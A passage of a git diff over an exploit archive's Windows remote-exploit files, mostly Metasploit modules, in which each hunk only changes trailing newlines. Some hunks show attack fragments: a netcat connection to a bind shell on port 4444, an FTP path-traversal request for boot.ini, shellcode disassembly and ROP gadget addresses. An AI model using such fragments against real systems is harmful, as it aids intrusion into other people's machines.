-#zero@zero-desktop:~/Desktop/exploit$ - - - +#zero@zero-desktop:~/Desktop/exploit$ \ No newline at end of file diff --git a/platforms/windows/remote/16078.py b/platforms/windows/remote/16078.py index 0ff4b3131..dd176c259 100755 --- a/platforms/windows/remote/16078.py +++ b/platforms/windows/remote/16078.py @@ -52,5 +52,4 @@ c.send(header) c.send(header) raw_input("[+] Done, press enter to quit") c.close() -s.close() - +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/16101.py b/platforms/windows/remote/16101.py index 4c6bc523b..a6e345583 100755 --- a/platforms/windows/remote/16101.py +++ b/platforms/windows/remote/16101.py @@ -137,4 +137,4 @@ hajar() time.sleep(3) print "[+] Skadush! Calculator will pop out..\r\n" -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/remote/16105.txt b/platforms/windows/remote/16105.txt index 34f7bb7d4..ebb61f2d4 100755 --- a/platforms/windows/remote/16105.txt +++ b/platforms/windows/remote/16105.txt @@ -70,4 +70,4 @@ default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect modpr0be@digital-echidna:~$ -# Eof +# Eof \ No newline at end of file diff --git a/platforms/windows/remote/16176.pl b/platforms/windows/remote/16176.pl index d1cc01c76..aceb6863d 100755 --- a/platforms/windows/remote/16176.pl +++ b/platforms/windows/remote/16176.pl @@ -49,5 +49,4 @@ print "DONE shell in a moment. . .\n"; $connect = "nc -vvn $target 4444"; -system $connect - +system $connect \ No newline at end of file diff --git a/platforms/windows/remote/16177.py b/platforms/windows/remote/16177.py index 2b45b51a7..52ed2a0f6 100755 --- a/platforms/windows/remote/16177.py +++ b/platforms/windows/remote/16177.py @@ -29,4 +29,4 @@ print (s.recv(1024)) s.send('PASS chapo\r\n') print (s.recv(1024)) s.send('RETR ' + payload + '\r\n') -s.close +s.close \ No newline at end of file diff --git a/platforms/windows/remote/1620.pm b/platforms/windows/remote/1620.pm index 303ba736f..28364b7ae 100755 --- a/platforms/windows/remote/1620.pm +++ b/platforms/windows/remote/1620.pm @@ -314,4 +314,4 @@ sub Gzip { } 1; -# milw0rm.com [2006-04-01] +# milw0rm.com [2006-04-01] \ No newline at end of file diff --git a/platforms/windows/remote/16242.html b/platforms/windows/remote/16242.html index 597107bb6..9d2fb5a81 100755 --- a/platforms/windows/remote/16242.html +++ b/platforms/windows/remote/16242.html @@ -42,4 +42,4 @@ - + \ No newline at end of file diff --git a/platforms/windows/remote/16259.txt b/platforms/windows/remote/16259.txt index e1dc972bb..319063831 100755 --- a/platforms/windows/remote/16259.txt +++ b/platforms/windows/remote/16259.txt @@ -12,4 +12,4 @@ RETR ../../../../boot.ini or other... -Twitter:clshackblog +Twitter:clshackblog \ No newline at end of file diff --git a/platforms/windows/remote/1626.pm b/platforms/windows/remote/1626.pm index c376b3ce3..782b3b259 100755 --- a/platforms/windows/remote/1626.pm +++ b/platforms/windows/remote/1626.pm @@ -116,4 +116,4 @@ sub Exploit 1; -# milw0rm.com [2006-03-30] +# milw0rm.com [2006-03-30] \ No newline at end of file diff --git a/platforms/windows/remote/1628.cpp b/platforms/windows/remote/1628.cpp index 47e49ae17..52c158d02 100755 --- a/platforms/windows/remote/1628.cpp +++ b/platforms/windows/remote/1628.cpp @@ -111,4 +111,4 @@ int main(int argc,char *argv[]) return 1; } -// milw0rm.com [2006-03-31] +// milw0rm.com [2006-03-31] \ No newline at end of file diff --git a/platforms/windows/remote/163.pl b/platforms/windows/remote/163.pl index 63c6d970d..14937bce8 100755 --- a/platforms/windows/remote/163.pl +++ b/platforms/windows/remote/163.pl @@ -187,4 +187,4 @@ print "\n"; print "\n--zzz--\n"; print "\n"; -# milw0rm.com [2004-03-19] +# milw0rm.com [2004-03-19] \ No newline at end of file diff --git a/platforms/windows/remote/16306.rb b/platforms/windows/remote/16306.rb index 32e846ebf..043acd786 100755 --- a/platforms/windows/remote/16306.rb +++ b/platforms/windows/remote/16306.rb @@ -143,4 +143,4 @@ class Metasploit3 < Msf::Exploit::Remote | end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16331.rb b/platforms/windows/remote/16331.rb index fa0253bc5..37aa0e7cc 100755 --- a/platforms/windows/remote/16331.rb +++ b/platforms/windows/remote/16331.rb @@ -143,4 +143,4 @@ __END__ 0000002C 4E dec esi 0000002D 85F6 test esi,esi 0000002F 75E1 jnz 0x12 -00000031 FFD7 call edi +00000031 FFD7 call edi \ No newline at end of file diff --git a/platforms/windows/remote/16332.rb b/platforms/windows/remote/16332.rb index f8377e9df..0b09e5273 100755 --- a/platforms/windows/remote/16332.rb +++ b/platforms/windows/remote/16332.rb @@ -133,4 +133,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16333.rb b/platforms/windows/remote/16333.rb index 3bac1045f..071bb241f 100755 --- a/platforms/windows/remote/16333.rb +++ b/platforms/windows/remote/16333.rb @@ -205,4 +205,4 @@ class Metasploit3 < Msf::Exploit::Remote pkt end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16334.rb b/platforms/windows/remote/16334.rb index 8dad04d74..61ce015de 100755 --- a/platforms/windows/remote/16334.rb +++ b/platforms/windows/remote/16334.rb @@ -164,4 +164,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16335.rb b/platforms/windows/remote/16335.rb index dd065edfe..9e4a940fc 100755 --- a/platforms/windows/remote/16335.rb +++ b/platforms/windows/remote/16335.rb @@ -74,4 +74,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16336.rb b/platforms/windows/remote/16336.rb index f06e9ac41..e3a77efda 100755 --- a/platforms/windows/remote/16336.rb +++ b/platforms/windows/remote/16336.rb @@ -72,4 +72,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16337.rb b/platforms/windows/remote/16337.rb index ac6c7c227..bab426a1a 100755 --- a/platforms/windows/remote/16337.rb +++ b/platforms/windows/remote/16337.rb @@ -72,4 +72,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16338.rb b/platforms/windows/remote/16338.rb index af969cad1..6497c12fa 100755 --- a/platforms/windows/remote/16338.rb +++ b/platforms/windows/remote/16338.rb @@ -72,4 +72,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16339.rb b/platforms/windows/remote/16339.rb index deadd4873..a6d6596bc 100755 --- a/platforms/windows/remote/16339.rb +++ b/platforms/windows/remote/16339.rb @@ -114,4 +114,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16340.rb b/platforms/windows/remote/16340.rb index 2441b4294..f27a307dd 100755 --- a/platforms/windows/remote/16340.rb +++ b/platforms/windows/remote/16340.rb @@ -97,4 +97,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16341.rb b/platforms/windows/remote/16341.rb index 7150d4ea5..c90a7d212 100755 --- a/platforms/windows/remote/16341.rb +++ b/platforms/windows/remote/16341.rb @@ -95,4 +95,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16342.rb b/platforms/windows/remote/16342.rb index 31c355fc5..5e61d8038 100755 --- a/platforms/windows/remote/16342.rb +++ b/platforms/windows/remote/16342.rb @@ -331,4 +331,4 @@ class Metasploit3 < Msf::Exploit::Remote return ret end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16343.rb b/platforms/windows/remote/16343.rb index 2e7516932..55e1d4834 100755 --- a/platforms/windows/remote/16343.rb +++ b/platforms/windows/remote/16343.rb @@ -91,4 +91,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16344.rb b/platforms/windows/remote/16344.rb index fdf0bfe7d..54a085409 100755 --- a/platforms/windows/remote/16344.rb +++ b/platforms/windows/remote/16344.rb @@ -84,4 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16345.rb b/platforms/windows/remote/16345.rb index f24bc600a..03938cad5 100755 --- a/platforms/windows/remote/16345.rb +++ b/platforms/windows/remote/16345.rb @@ -86,4 +86,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16346.rb b/platforms/windows/remote/16346.rb index d5435569b..1bfbc6980 100755 --- a/platforms/windows/remote/16346.rb +++ b/platforms/windows/remote/16346.rb @@ -69,4 +69,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16347.rb b/platforms/windows/remote/16347.rb index 8f2250b03..41c058ec1 100755 --- a/platforms/windows/remote/16347.rb +++ b/platforms/windows/remote/16347.rb @@ -69,4 +69,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16348.rb b/platforms/windows/remote/16348.rb index 5f0ec07de..7fa656bf6 100755 --- a/platforms/windows/remote/16348.rb +++ b/platforms/windows/remote/16348.rb @@ -78,4 +78,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16349.rb b/platforms/windows/remote/16349.rb index 2dda50709..fc3090995 100755 --- a/platforms/windows/remote/16349.rb +++ b/platforms/windows/remote/16349.rb @@ -80,4 +80,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16350.rb b/platforms/windows/remote/16350.rb index fdffa8412..89f653ba4 100755 --- a/platforms/windows/remote/16350.rb +++ b/platforms/windows/remote/16350.rb @@ -81,4 +81,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16351.rb b/platforms/windows/remote/16351.rb index 3e3e15284..65d175d46 100755 --- a/platforms/windows/remote/16351.rb +++ b/platforms/windows/remote/16351.rb @@ -90,4 +90,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16352.rb b/platforms/windows/remote/16352.rb index 1b9ddd8c4..245ae9713 100755 --- a/platforms/windows/remote/16352.rb +++ b/platforms/windows/remote/16352.rb @@ -87,4 +87,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16353.rb b/platforms/windows/remote/16353.rb index 2cf56e51a..2c0dc5db0 100755 --- a/platforms/windows/remote/16353.rb +++ b/platforms/windows/remote/16353.rb @@ -87,4 +87,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16354.rb b/platforms/windows/remote/16354.rb index d360da84f..48c840cad 100755 --- a/platforms/windows/remote/16354.rb +++ b/platforms/windows/remote/16354.rb @@ -123,4 +123,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16355.rb b/platforms/windows/remote/16355.rb index 868124a28..0a8121467 100755 --- a/platforms/windows/remote/16355.rb +++ b/platforms/windows/remote/16355.rb @@ -105,4 +105,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16356.rb b/platforms/windows/remote/16356.rb index 963cbe0d9..6cb789a9a 100755 --- a/platforms/windows/remote/16356.rb +++ b/platforms/windows/remote/16356.rb @@ -124,4 +124,4 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16357.rb b/platforms/windows/remote/16357.rb index 1083c94b3..19b60cce2 100755 --- a/platforms/windows/remote/16357.rb +++ b/platforms/windows/remote/16357.rb @@ -86,4 +86,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16358.rb b/platforms/windows/remote/16358.rb index fb9dd871f..b7c57af23 100755 --- a/platforms/windows/remote/16358.rb +++ b/platforms/windows/remote/16358.rb @@ -101,4 +101,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16359.rb b/platforms/windows/remote/16359.rb index 835eba290..f875d0e70 100755 --- a/platforms/windows/remote/16359.rb +++ b/platforms/windows/remote/16359.rb @@ -209,5 +209,4 @@ class Metasploit3 < Msf::Exploit::Remote return ret end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16360.rb b/platforms/windows/remote/16360.rb index 0bc649da8..f09e772a7 100755 --- a/platforms/windows/remote/16360.rb +++ b/platforms/windows/remote/16360.rb @@ -545,4 +545,4 @@ class Metasploit3 < Msf::Exploit::Remote c.put(pkt.to_s) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16361.rb b/platforms/windows/remote/16361.rb index b5e3a70bb..a5b76d6b6 100755 --- a/platforms/windows/remote/16361.rb +++ b/platforms/windows/remote/16361.rb @@ -437,4 +437,4 @@ class Metasploit3 < Msf::Exploit::Remote 10 end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16362.rb b/platforms/windows/remote/16362.rb index 2570fe8ea..d36738b78 100755 --- a/platforms/windows/remote/16362.rb +++ b/platforms/windows/remote/16362.rb @@ -945,5 +945,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16363.rb b/platforms/windows/remote/16363.rb index fc5cf0a26..fa8ec52c5 100755 --- a/platforms/windows/remote/16363.rb +++ b/platforms/windows/remote/16363.rb @@ -149,4 +149,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16364.rb b/platforms/windows/remote/16364.rb index f371f67dc..8dcf37e87 100755 --- a/platforms/windows/remote/16364.rb +++ b/platforms/windows/remote/16364.rb @@ -132,4 +132,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16366.rb b/platforms/windows/remote/16366.rb index 6242937dc..d59eb9770 100755 --- a/platforms/windows/remote/16366.rb +++ b/platforms/windows/remote/16366.rb @@ -272,4 +272,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16367.rb b/platforms/windows/remote/16367.rb index 795865e24..7bac2a632 100755 --- a/platforms/windows/remote/16367.rb +++ b/platforms/windows/remote/16367.rb @@ -325,4 +325,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16368.rb b/platforms/windows/remote/16368.rb index 7c8e0e66e..7a6ab2387 100755 --- a/platforms/windows/remote/16368.rb +++ b/platforms/windows/remote/16368.rb @@ -161,5 +161,4 @@ class Metasploit3 < Msf::Exploit::Remote # Perform any required client-side payload handling handler end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16369.rb b/platforms/windows/remote/16369.rb index 19dc7703c..2ce48ef66 100755 --- a/platforms/windows/remote/16369.rb +++ b/platforms/windows/remote/16369.rb @@ -127,4 +127,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16370.rb b/platforms/windows/remote/16370.rb index d1f337032..9bf71d81b 100755 --- a/platforms/windows/remote/16370.rb +++ b/platforms/windows/remote/16370.rb @@ -157,4 +157,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16371.rb b/platforms/windows/remote/16371.rb index 943843ad8..6b69c524f 100755 --- a/platforms/windows/remote/16371.rb +++ b/platforms/windows/remote/16371.rb @@ -96,4 +96,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16372.rb b/platforms/windows/remote/16372.rb index ca3943bb9..1456289f1 100755 --- a/platforms/windows/remote/16372.rb +++ b/platforms/windows/remote/16372.rb @@ -193,4 +193,4 @@ long _NetrJoinDomain2@28 ( user, site, client site, version, lmtoken, nttoken 5. validated. -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/16373.rb b/platforms/windows/remote/16373.rb index 988631a74..e7a1594b2 100755 --- a/platforms/windows/remote/16373.rb +++ b/platforms/windows/remote/16373.rb @@ -141,4 +141,4 @@ class Metasploit3 < Msf::Exploit::Remote end end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16374.rb b/platforms/windows/remote/16374.rb index 44ca97d3c..b3eb4e009 100755 --- a/platforms/windows/remote/16374.rb +++ b/platforms/windows/remote/16374.rb @@ -298,5 +298,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16375.rb b/platforms/windows/remote/16375.rb index da3a810e9..f2a25638e 100755 --- a/platforms/windows/remote/16375.rb +++ b/platforms/windows/remote/16375.rb @@ -179,5 +179,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16376.rb b/platforms/windows/remote/16376.rb index 1c6a4dbba..a88224964 100755 --- a/platforms/windows/remote/16376.rb +++ b/platforms/windows/remote/16376.rb @@ -166,4 +166,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16377.rb b/platforms/windows/remote/16377.rb index 5da0dda2e..f3720da12 100755 --- a/platforms/windows/remote/16377.rb +++ b/platforms/windows/remote/16377.rb @@ -257,4 +257,4 @@ class Metasploit3 < Msf::Exploit::Remote return token end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16378.rb b/platforms/windows/remote/16378.rb index afd761f92..597022dcf 100755 --- a/platforms/windows/remote/16378.rb +++ b/platforms/windows/remote/16378.rb @@ -112,4 +112,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16379.rb b/platforms/windows/remote/16379.rb index 34ea55f1d..dddfaa3bd 100755 --- a/platforms/windows/remote/16379.rb +++ b/platforms/windows/remote/16379.rb @@ -82,4 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16380.rb b/platforms/windows/remote/16380.rb index ed0e6b7cf..4f91499fa 100755 --- a/platforms/windows/remote/16380.rb +++ b/platforms/windows/remote/16380.rb @@ -470,4 +470,4 @@ end 0x00602a64 pop esi; pop ebx; ret 0x006030e1 pop esi; pop ecx; ret -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/16382.rb b/platforms/windows/remote/16382.rb index 4e7287532..c95c8be64 100755 --- a/platforms/windows/remote/16382.rb +++ b/platforms/windows/remote/16382.rb @@ -77,4 +77,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16383.rb b/platforms/windows/remote/16383.rb index b52a89541..d4ff5103a 100755 --- a/platforms/windows/remote/16383.rb +++ b/platforms/windows/remote/16383.rb @@ -77,4 +77,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16384.rb b/platforms/windows/remote/16384.rb index 38b856350..035c96519 100755 --- a/platforms/windows/remote/16384.rb +++ b/platforms/windows/remote/16384.rb @@ -77,4 +77,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16385.rb b/platforms/windows/remote/16385.rb index 52ce2031f..df65560cc 100755 --- a/platforms/windows/remote/16385.rb +++ b/platforms/windows/remote/16385.rb @@ -78,4 +78,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16389.rb b/platforms/windows/remote/16389.rb index 585b44f0b..5e20e3da2 100755 --- a/platforms/windows/remote/16389.rb +++ b/platforms/windows/remote/16389.rb @@ -87,4 +87,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16390.rb b/platforms/windows/remote/16390.rb index 29f4cb40c..39287e41f 100755 --- a/platforms/windows/remote/16390.rb +++ b/platforms/windows/remote/16390.rb @@ -123,5 +123,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16391.rb b/platforms/windows/remote/16391.rb index 39a8be3da..53e8b2ee9 100755 --- a/platforms/windows/remote/16391.rb +++ b/platforms/windows/remote/16391.rb @@ -85,4 +85,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16392.rb b/platforms/windows/remote/16392.rb index 5830fd148..36dccf82a 100755 --- a/platforms/windows/remote/16392.rb +++ b/platforms/windows/remote/16392.rb @@ -485,4 +485,4 @@ exec sp_executesql @z| return res[:rows][0][0] end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16393.rb b/platforms/windows/remote/16393.rb index ca8e15521..a8ad7976b 100755 --- a/platforms/windows/remote/16393.rb +++ b/platforms/windows/remote/16393.rb @@ -109,4 +109,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16394.rb b/platforms/windows/remote/16394.rb index 8ea543888..82b56a69c 100755 --- a/platforms/windows/remote/16394.rb +++ b/platforms/windows/remote/16394.rb @@ -131,5 +131,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/platforms/windows/remote/16395.rb b/platforms/windows/remote/16395.rb index 16122a222..9723d905c 100755 --- a/platforms/windows/remote/16395.rb +++ b/platforms/windows/remote/16395.rb @@ -109,4 +109,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16396.rb b/platforms/windows/remote/16396.rb index d92ec1b49..298aaedca 100755 --- a/platforms/windows/remote/16396.rb +++ b/platforms/windows/remote/16396.rb @@ -482,4 +482,4 @@ exec sp_executesql @z| return nil end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16397.rb b/platforms/windows/remote/16397.rb index e11a5d537..498e9634a 100755 --- a/platforms/windows/remote/16397.rb +++ b/platforms/windows/remote/16397.rb @@ -90,4 +90,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16398.rb b/platforms/windows/remote/16398.rb index 8ad63d5bd..13496afd0 100755 --- a/platforms/windows/remote/16398.rb +++ b/platforms/windows/remote/16398.rb @@ -94,4 +94,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16399.rb b/platforms/windows/remote/16399.rb index 9f9cc2981..ad1d24931 100755 --- a/platforms/windows/remote/16399.rb +++ b/platforms/windows/remote/16399.rb @@ -115,4 +115,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/164.c b/platforms/windows/remote/164.c index 2fe58d1ba..73fe672ec 100755 --- a/platforms/windows/remote/164.c +++ b/platforms/windows/remote/164.c @@ -278,4 +278,4 @@ int SendXMail( char *mailaddr, char *tftp, char *smtpserver, char *shellcode return 0; } -// milw0rm.com [2004-03-23] +// milw0rm.com [2004-03-23] \ No newline at end of file diff --git a/platforms/windows/remote/16400.rb b/platforms/windows/remote/16400.rb index c2068e2d1..85ab17d87 100755 --- a/platforms/windows/remote/16400.rb +++ b/platforms/windows/remote/16400.rb @@ -73,4 +73,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16401.rb b/platforms/windows/remote/16401.rb index 4e305bb49..7f314b266 100755 --- a/platforms/windows/remote/16401.rb +++ b/platforms/windows/remote/16401.rb @@ -82,4 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16402.rb b/platforms/windows/remote/16402.rb index 4370eabb3..c8d963116 100755 --- a/platforms/windows/remote/16402.rb +++ b/platforms/windows/remote/16402.rb @@ -81,4 +81,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16403.rb b/platforms/windows/remote/16403.rb index 1ba06f45c..86b063c1a 100755 --- a/platforms/windows/remote/16403.rb +++ b/platforms/windows/remote/16403.rb @@ -106,4 +106,4 @@ class Metasploit3 < Msf::Exploit::Remote } end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16404.rb b/platforms/windows/remote/16404.rb index 6913bf3aa..dcf13fa0e 100755 --- a/platforms/windows/remote/16404.rb +++ b/platforms/windows/remote/16404.rb @@ -120,4 +120,4 @@ class Metasploit3 < Msf::Exploit::Remote handler disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16405.rb b/platforms/windows/remote/16405.rb index efe1c6629..754b7acd3 100755 --- a/platforms/windows/remote/16405.rb +++ b/platforms/windows/remote/16405.rb @@ -152,4 +152,4 @@ and run it through again. Only tested on WinXP SP1 016c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b......... 016d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b......... 01725c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b......... -017e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b......... +017e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b......... \ No newline at end of file diff --git a/platforms/windows/remote/16406.rb b/platforms/windows/remote/16406.rb index 3edee11ee..d47284a52 100755 --- a/platforms/windows/remote/16406.rb +++ b/platforms/windows/remote/16406.rb @@ -131,4 +131,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16407.rb b/platforms/windows/remote/16407.rb index a590e74a1..28c300267 100755 --- a/platforms/windows/remote/16407.rb +++ b/platforms/windows/remote/16407.rb @@ -88,4 +88,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16408.rb b/platforms/windows/remote/16408.rb index e92c6c4c5..b51bae725 100755 --- a/platforms/windows/remote/16408.rb +++ b/platforms/windows/remote/16408.rb @@ -147,4 +147,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16409.rb b/platforms/windows/remote/16409.rb index a552bdc06..6b0cf38f7 100755 --- a/platforms/windows/remote/16409.rb +++ b/platforms/windows/remote/16409.rb @@ -90,4 +90,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16410.rb b/platforms/windows/remote/16410.rb index aa3de6801..124982b75 100755 --- a/platforms/windows/remote/16410.rb +++ b/platforms/windows/remote/16410.rb @@ -124,4 +124,4 @@ long sub_401000 ( ); } -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/16411.rb b/platforms/windows/remote/16411.rb index 20e916e15..b7d3b1deb 100755 --- a/platforms/windows/remote/16411.rb +++ b/platforms/windows/remote/16411.rb @@ -90,4 +90,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16412.rb b/platforms/windows/remote/16412.rb index baaceba3a..900fc57f1 100755 --- a/platforms/windows/remote/16412.rb +++ b/platforms/windows/remote/16412.rb @@ -89,4 +89,4 @@ short sub_28E893D0 ( [in][ref][string] char * arg_2, [in, out][ref] long * arg_3 ); -=end +=end \ No newline at end of file diff --git a/platforms/windows/remote/16413.rb b/platforms/windows/remote/16413.rb index cb41b8eda..2ce16cc73 100755 --- a/platforms/windows/remote/16413.rb +++ b/platforms/windows/remote/16413.rb @@ -287,4 +287,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16414.rb b/platforms/windows/remote/16414.rb index f022d4b6f..319b8230f 100755 --- a/platforms/windows/remote/16414.rb +++ b/platforms/windows/remote/16414.rb @@ -74,4 +74,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16415.rb b/platforms/windows/remote/16415.rb index c715f59cd..837768b15 100755 --- a/platforms/windows/remote/16415.rb +++ b/platforms/windows/remote/16415.rb @@ -93,4 +93,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16416.rb b/platforms/windows/remote/16416.rb index 29fffdc39..55eaac9b1 100755 --- a/platforms/windows/remote/16416.rb +++ b/platforms/windows/remote/16416.rb @@ -109,4 +109,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16418.rb b/platforms/windows/remote/16418.rb index 0225d5ec7..5392d0275 100755 --- a/platforms/windows/remote/16418.rb +++ b/platforms/windows/remote/16418.rb @@ -84,4 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/platforms/windows/remote/16419.rb 